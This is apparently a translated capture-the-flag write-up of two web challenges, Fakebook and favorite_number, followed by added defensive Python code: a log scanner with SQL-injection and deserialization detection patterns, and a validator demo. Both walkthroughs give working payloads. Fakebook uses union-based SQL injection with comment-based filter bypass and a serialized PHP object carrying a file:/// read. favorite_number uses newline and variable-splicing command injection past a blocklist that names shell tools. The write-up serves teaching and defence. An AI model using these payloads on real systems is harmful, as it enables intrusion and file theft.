[attack and defense world web] difficulty Samsung 9-point introductory question (end): Fakebook, favorite_ number
2022-07-23 18:38:00 【Black zone (rise)】
Catalog
7、Fakebook
Approach:
1、Look for the injection point; a deserialization function and serialized content are found; guess the file location
Process:
View the robots.txt file
It is found to point to a backup file
Regular matching: the blog field must match https://
Now register
This entry can be clicked
It is found that a parameter is passed
Consider whether there is:
Injection
File inclusion
Pseudo-protocol
……
Entering a single quote produces an error
But it cannot be closed
Try another way
Add and 1=1
(normal echo)
Enter and 1=2
(error)
So there is an injection point
Check the number of fields
order by 4
(normal echo)
order by 5
(error)
So there are 4 fields
Determine the echo point
Try to bypass the filter:
/**/union/**/ select /**/1,2,3,4
Find that 2 is the echo point
Dump the database name
/**/union/**/ select/**/ 1,database(),3,4
The database is fakebook
Dump the tables
-1 /**/union /**/ select/**/ 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema=database()#
Obtain the users table
Dump the columns
-1 /**/union /**/ select/**/ 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema="fakebook"#
Dump the data
-1 /**/union /**/ select/**/ 1,group_concat(no,'~',data) ,3,4 from fakebook.users#
No useful information
Attention then turns to the deserialization function, and this path has appeared many times
File path
/var/www/html/view.php
Then the path of flag may also be
/var/www/html/flag.php
Because there is a deserialization function, we should inject a serialized statement
Use the file:/// protocol to access files on the local machine
-1 /**/union /**/ select /**/1,2 ,3,'O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:18;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#
But it does not display the content of flag.php
Many flags are like this; look in the page source (Ctrl+U to view source)
A base64-encoded string is found
PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tjMWU1NTJmZGY3NzA0OWZhYmY2NTE2OGYyMmY3YWVhYn0iOw0KZXhpdCgwKTsNCg==
Decoded as
flag{c1e552fdf77049fabf65168f22f7aeab}
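A detection-side complement to the Fakebook walk-through, added here and not part of the original write-up: a small Python scanner that normalizes request URIs (URL-decoding and collapsing the /**/ comment-as-space trick) and flags the indicators this challenge exercised, including union-based enumeration of information_schema, a serialized PHP object in a parameter, and a file:/// URL. The access-log lines are constructed samples modelled on the requests above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines modelled on the requests in the write-up (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /view.php?no=1 HTTP/1.1" 200',
    '10.0.0.5 - - "GET /view.php?no=1%20and%201=2 HTTP/1.1" 500',
    '10.0.0.5 - - "GET /view.php?no=-1/**/union/**/select/**/1,group_concat(table_name),3,4'
    '%20from%20information_schema.tables%20where%20table_schema=database()%23 HTTP/1.1" 200',
    '10.0.0.5 - - "GET /view.php?no=-1/**/union/**/select/**/1,2,3,%27O:8:%22UserInfo%22:1:'
    '{s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27%23 HTTP/1.1" 200',
]

# Indicators matched against the normalized (decoded, lower-cased, comment-stripped) request URI.
INDICATORS = {
    "boolean_probe": re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+"),
    "union_select": re.compile(r"\bunion\b.{0,40}?\bselect\b"),
    "schema_enum": re.compile(r"\binformation_schema\."),
    "php_object": re.compile(r'\bo:\d+:"'),   # serialized PHP object, e.g. O:8:"UserInfo"
    "file_scheme": re.compile(r"\bfile:///"),
}

def normalize(raw: str) -> str:
    """Undo the evasions seen above: URL-decode twice and replace inline comments by spaces."""
    s = unquote_plus(unquote_plus(raw))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return s.lower()

def extract_uri(line: str) -> str:
    """Pull the request target out of a common-log-format line."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    return m.group(1) if m else ""

def classify(line: str) -> list:
    """Return the sorted names of all indicators that fire on one log line."""
    uri = normalize(extract_uri(line))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(uri))

def scan(lines) -> list:
    """Return (line index, indicator names) for every line that triggers at least one indicator."""
    findings = []
    for i, line in enumerate(lines):
        hits = classify(line)
        if hits:
            findings.append((i, hits))
    return findings

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(hits)}")
```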
8、favorite_number
Approach:
1、Source code analysis, bypass the filter, find a way to get the flag
Process:
After entering, PHP code is shown
Code 1: Array
An array is received via $_POST["stuff"]
And it is restricted by $stuff[0] != 'admin'
Array index overflow can be used to bypass this
stuff[2^32]=admin
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {
    $num = $_POST["num"];
Code 2: Regular matching
"/^\d+$/im": matches a string of digits, no other characters are allowed
/m: multi-line matching; if one line matches, preg_match returns true
A newline: 0x0a (ASCII), %0a (URL-encoded)
    if (preg_match("/^\d+$/im",$num)){
Code 3: Filter keywords
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
            // the remainder of the challenge source is not reproduced in the write-up
        }
    }
}
1、Array: numeric subscript overflow bypass
2、Regular matching: %0a multi-line bypass
3、Keyword filtering: other commands can be spliced on with && (ASCII 0x26, URL-encoded %26)
Construct the payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als
Capture the request with Burp
It turns out the content submitted via HackBar is encoded
Use Burp to change it back to the original payload
Then send
Start looking for the flag
First look at the inode number of flag
payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0als -i /
Submit via HackBar again, modify the packet again
18497049 flag
Read flag
payload:
stuff[4294967296]=admin&stuff[1]=user&num=123%0atac `find / -inum 18497049`
Submit via HackBar again, modify the packet again
It times out
Another way
Because $ is not filtered, try splicing with variables
payload:
stuff[4294967296]=admin&stuff[1]=user&num=1%0aa=f;b=lag;tac /$a$b;
cyberpeace{7d870124ba11eacef73c2c409588eadf}
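As an added example (not from the original write-up or the challenge source), the two favorite_number checks on num transcribed into Python's re module and run against the page's own decoded payloads, next to a positive whole-value validator that rejects them. It shows why an anchor under /m plus a keyword blocklist is not a substitute for a strict pattern over the entire value.

```python
import re

# The two challenge checks transcribed into Python's re: PCRE /i -> IGNORECASE, /m -> MULTILINE.
WEAK_NUMERIC = re.compile(r"^\d+$", re.IGNORECASE | re.MULTILINE)
BLOCKLIST = re.compile(
    r'''sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\|'|"|\|''', re.IGNORECASE
)

def weak_check(num: str) -> bool:
    """Mirrors the challenge: preg_match finds *some* all-digit line, and no blocklisted token appears."""
    return WEAK_NUMERIC.search(num) is not None and BLOCKLIST.search(num) is None

def strict_check(num: str) -> bool:
    """Positive validation: the entire value is 1..10 ASCII digits, so a newline can never slip through."""
    return re.fullmatch(r"\d{1,10}", num, re.ASCII) is not None

# Values of `num` after URL decoding, taken from the write-up (%0a is the newline).
CASES = [
    "123",                       # legitimate input
    "123\nls",                   # multi-line bypass: the first line satisfies ^\d+$ under /m
    "123\ncat /flag",            # the blocklist does catch this obvious form
    "1\na=f;b=lag;tac /$a$b;",   # variable splicing: no literal 'flag', and '$' is not blocked
]

def evaluate(cases=CASES) -> dict:
    """Map each value to (passes weak check, passes strict check)."""
    return {c: (weak_check(c), strict_check(c)) for c in cases}

if __name__ == "__main__":
    for value, (weak, strict) in evaluate().items():
        print(f"{value!r:32} weak={weak!s:5} strict={strict}")
```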